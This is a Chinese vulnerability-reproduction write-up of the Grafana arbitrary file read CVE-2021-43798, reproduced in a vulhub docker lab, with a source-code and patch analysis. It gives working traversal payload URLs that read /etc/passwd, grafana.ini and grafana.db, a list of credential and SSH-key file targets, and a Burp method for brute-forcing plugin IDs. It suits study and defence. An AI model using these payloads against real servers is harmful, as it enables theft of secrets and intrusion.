【漏洞复现】Grafana任意文件读取(CVE-2021-43798)
创始人
2024-06-01 12:48:07
0

docker环境搭建

#进入环境
cd vulhub/grafana/CVE-2021-43798

在这里插入图片描述

#启动环境,这个过程可能会有点慢,保持网络通畅
docker-compose up -d

在这里插入图片描述

#查看环境
docker-compose ps

在这里插入图片描述

直接访问虚拟机 IP地址:3000

目录遍历原理

目录遍历原理:攻击者可以通过将包含特殊目录遍历字符序列(…/)的特制HTTP请求发送到受影响的设备来利用此漏洞。通常是由于代码没有判断拼接路径的真实路径是否合法。

目录遍历影响:成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件。严重的会导致服务器中的敏感重要数据被窃取,例如数据库、WEB配置文件等。

源码分析

源码链接: 提取码: 8bf4

Grafana是利用go语言编写的可视化应用程序平台。

漏洞影响版本Grafana 8.0.0-beta1 - 8.3.0

源码分析:主要问题出现在pkg/api/plugins.go文件的getPluginAssets函数。先查找插件是否存在,如果插件不存在,则返回"Plugin not found",如果存在这个插件名,则会匹配 /public/plugins/:pluginId/*中的*,这个地方没有做任何过滤。最后打开pluginFilePath并输出相关内容,就可以造成任意文件读取。

payload/public/plugins/插件名/想要访问文件的相对路径
在这里插入图片描述

原理/成因:没有对文件名进行限制,攻击者可以利用../的方式穿越目录,读取到服务器上的任意文件。

总结:只要是安装了任何一个插件就可以出现任意文件读取,因为是plugins的问题。

补丁分析

原漏洞代码:requestedFile := filepath.Clean(web.Params(c.Req)["*"])。该代码使用Clean函数对请求进行../的清理,但是Clean函数并不能做到全部清理,如下范例:

代码:
package main
import ( "fmt""path/filepath"
) 
// Calling main 
func main() { // Calling the Clean() function fmt.Println(filepath.Clean("/GFG/./../Geeks")) fmt.Println(filepath.Clean("GFG/../Geeks")) fmt.Println(filepath.Clean("..GFG/./../Geeks")) fmt.Println(filepath.Clean("gfg/../../../Geek/GFG")) 
}输出:
/Geeks
Geeks
Geeks
../../Geek/GFG

在后来使用open函数时就可以成功读取文件内容了。

官网的补丁如下:

requestedFile := filepath.Clean(filepath.Join("/", web.Params(c.Req)["*"]))rel, err := filepath.Rel("/", requestedFile)if err != nil {// this should not never failc.JsonApiErr(500, "Relative path found", err)return}

可以看到将clean和join合并利用后,增加了filepath.Rel函数

func Rel(basepath, targpath string) (string, error)

filepath.Rel()函数会以basepath作为基准,返回targpath相对于basepath的相对路径,不过前提是basepathtargpath必须都是相对路径,若其中有一个是绝对路径则会返回错误。

如果无法相对于基本路径创建targpath,或者如果需要知道当前工作目录以进行计算,则会返回错误。

故使用Rel函数修复了目录穿越的问题。

修复方式

升级版本

漏洞利用

攻击路径POC

/public/plugins/<“plugin-id”>其中<“plugin-id”>是任何已安装插件的插件ID。

读取etc/passwd:

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd
在这里插入图片描述

读取配置文件:

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini
在这里插入图片描述

读取数据库:

/public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db
在这里插入图片描述

读取其它文件:

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

默认安装插件列表:

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin

burp爆破

由于插件过多,利用burp爆破
在这里插入图片描述

将插件放入文件里做为一个字典
在这里插入图片描述

导入burp进行爆破
在这里插入图片描述

相关内容

热门资讯

经纪、投行业务同比增长,国盛金... 同时,公司强化各类风险管控,信用减值准备同比有所减少。 7月10日盘后,国盛金...
美股地区性银行股强势反弹后现隐... 随着新一轮财报季即将开始,在近期强势反弹的美国地区性银行股可能会让投资者感到失望。部分华尔街策略师指...
山洪、暴雨、地灾、渍涝四预警齐... 今天(7月10日)18时,水利部、中央气象台等多部门发布多条气象预警信息,详情如下↓水利部和中国气象...
两连板上纬新材提示风险,股份协... 转自:北京商报北京商报讯(记者 马换换 王蔓蕾)受智元机器人拟入主消息影响,上纬新材(688585)...
迈瑞医疗:董秘回应并致谢关注,... 投资者提问:李董,请问公司三年内有无港股上市计划?董秘回答(迈瑞医疗SZ300760):您好,谢谢关...
迈瑞医疗:集采等政策短期有挑战... 投资者提问:集采的影响大家大概了解一些了,请问DRG,套餐解绑,检验结果互认对需求端的影响有多大,对...
美团辟谣“30万本科生送外卖”   炒股就看金麒麟分析师研报,权威,专业,及时,全面,助您挖掘潜力主题机会! 辟谣。7月10日,美...
云南省委书记王宁、省长王予波与...   原标题:王宁王予波与国家金融监管总局局长李云泽会谈  来源:云南发布  7月9日,省委书记王宁,...
智云国际(08521.HK)盈... 格隆汇7月10日丨智云国际(08521.HK)公告,截至2025年5月31日止五个月录得除税前亏损约...
山东移动暑期信号升格,开启文旅... 又是一年暑期至,行囊一背,相机一带,一场说走就走的旅行正式开启。为护航游客畅快出行,山东移动积极开展...